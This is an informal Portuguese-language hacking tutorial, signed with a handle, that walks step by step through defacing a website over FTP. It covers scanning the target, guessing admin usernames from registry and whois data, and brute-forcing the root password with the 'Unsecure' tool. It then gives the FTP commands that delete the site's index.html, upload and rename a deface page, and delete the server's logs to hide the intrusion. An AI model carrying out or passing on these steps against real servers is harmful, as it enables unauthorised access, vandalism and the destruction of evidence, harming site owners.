Leve em conta as seguintes considerações:
ALVO:www.essesitenaoexiste.com
IP: 189.25.78.145
SCANNER: por um bom scanner descobrimos que o servidor usa ftp sim(não precisa ser necessariamnte anonimo), o servidor é o pure ftpd 1.0
Com nossa máquina cujo sistema operacional é o Windowns XP sp2, vamos ao MS-DOS -> Digitamos FTP -> Digite help e pressione "enter".
Aparecerá intão uma lista cmo essa:
user : nome do usuário para logar-se
pass : senha do usuário para logar-se
get : faz download de um arquivo especificado
put : faz download de um arquivo
rename : renomeia o arquivo especificado
cd : muda de diretótio
cd.. : sobe um diretório acima
disconnect : finaliza conexão ftp
dir : lista os diretórios do servidor
open : abre uma conexão em ftp
bye : fxa a conexão e sai do prompt
Bom, vamos por em prática, começando por exemplo a rodar o scanner "nmap" e vamos a descobrir o sistema operacional do site, que na ocasião é "Linux Ubuntu 7.10"
Vamos novamente(agora que vc ja sabe cmo chegar lá) ao prompt do ftp.
MÃOS NA MASSA:
Já no prompt FTP, vamos abrir uma conexão com nosso alvo, para isso siga o exemplo:
o 189.25.78.145 [enter]
Nisso, sera pedido o login.
->User
Neste campo basta digitar 'admin', SE esse usuário existir, sera pedido então uma senha , mas se naõ existir, aparecerá uma mensagem de erro.
DICA:
| Em outras ocasioes, vc pode usar alguns metodos que eu uso e recomendo para descobri o nome do 'user'.Basta vc entrar no site registro.br, pesquise sobre o site alvo e veja os nomes dos webmasters, normalmente são os nomes do user.Ou intão, vasculhe o site ou pegue cmo referencia o e-mail de contato com o administrador.Já deu certo comigo várias vezes ! |
Vamos supor que vc seguindo alguns métodos para descobrir o nome do root(acertação, mandinga, footprinting, whois...) consiga com êxito o nome do usuário root...mas e a senha tio Sanders? ai q esta, isto é uma coisa que vc só vai conseguir seguindo tres métodos:agindo cmo um defacer, fazendo macumba ou simplismente pedindo a senha(esta ultima na minha opinião é a mais defecil)
Depois do nosso constrangimento para saber a senha, vamos usar um dos métodos maaaais simples de se conseguir a senha, via brute-force !
No nosso exemplo usaremos o programa ' Unsecure', que para quem não sabe, é um programa que vai combinando senhas até conseguir descobri-la.
Vamos de um pequeno tutorial Unsecure:
->Hostname or IP:coloque o ip do alvo aqui(no nosso caso é 189.25.78.145)
->Port:Porta da conexão, e, cmo estamos fazendo um ataque via ftp, use a porta 21.
->Current Password: Neste espaço sera mostrada a senha descoberta.Apenas ñ digite nada.
->Username
igite root->Dictionary file:Nome da sua wordlist(SE vc usá-la, faça uma com o nome de unsdic.txt)
Vamos ás opções de ataque:
*Primeiro vamos levar em conta que não fizemos nenhuma engenharia social e nem temos uma wordlist boa o suficiente.Por isso não usaemos nenhum tipo de lista de palavras.
*Marque "recconect on disconnect" para se caso o ftp falhar depois de algumas tentativas, ele volta automaticamente na onde parou.
*Vamos marcar todos tipos de caracteres disponíveis(números, letras maiusculas, letras minusculas, caracteres especiais)
*Aperte Connect
Vamos supor que depois de muito tempo descobrimos a senha, intão aparecera uma mensagem igual à esta:
"Server 189.25.78.145 is unsecure.The password is MANCHESTER"
->Vamos para o FTP.Já no prompt de comando, digite:
ftp> open
ftp>189.25.78.145 user root pass MANCHESTER
aparecera a mensagem:
"user root logged in"
PRONTO! estamos logados cmo root!agora nsso próximo passo sera encontar a index, para que possamos 'deface-a-la'
ftp>dir [enter]
->sera listado os diretórios, procure especialmente pelo do 'apache'.Para acessá-lo, siga o exemplo:
ftp>cd apache [enter]
ftp>dir [enter]
Mais um dir e achamos diretório 'htdocs', é la que fica(em servidores web apache) a index.Para acessálho siga o exemplo:
ftp>cd htdocs [enter]
ftp>dir [enter]
Pode procurar que vc ira achar o arquivo tão procurado 'index.html'.Vamos começar o processo de substituição?
digite no prompt:
ftp>delete index.html
*estaremos deletando a página original
ftp>put deface.html
*coloque sua page deface que esta no seu PC
ftp>rename deface.html index.html
*renomeamos para 'index'.
Bem, nós acabamos de fazer o deface, agora vamos tratar de apagar nossos rastros deixados no servidor.Vamos ao anonimato:
ftp>cd [enter]
*voltamos para um diretório anterior, estamos no diretório do apache, depois:
ftp>dir
*procure por logs, acesse o diretório, e delete tudo com o comando 'delete'.
Pronto, digite 'quit' e acesse o site vítima 'www.essesitenãoexiste.com' e visualize a NOSSA página desfigurada
by; ร4иD³яร☣
LINKS EXTERIORES
Download NMAP
Download Unsecure
http://www.softpedia.com/get/Office-...UnSecure.shtml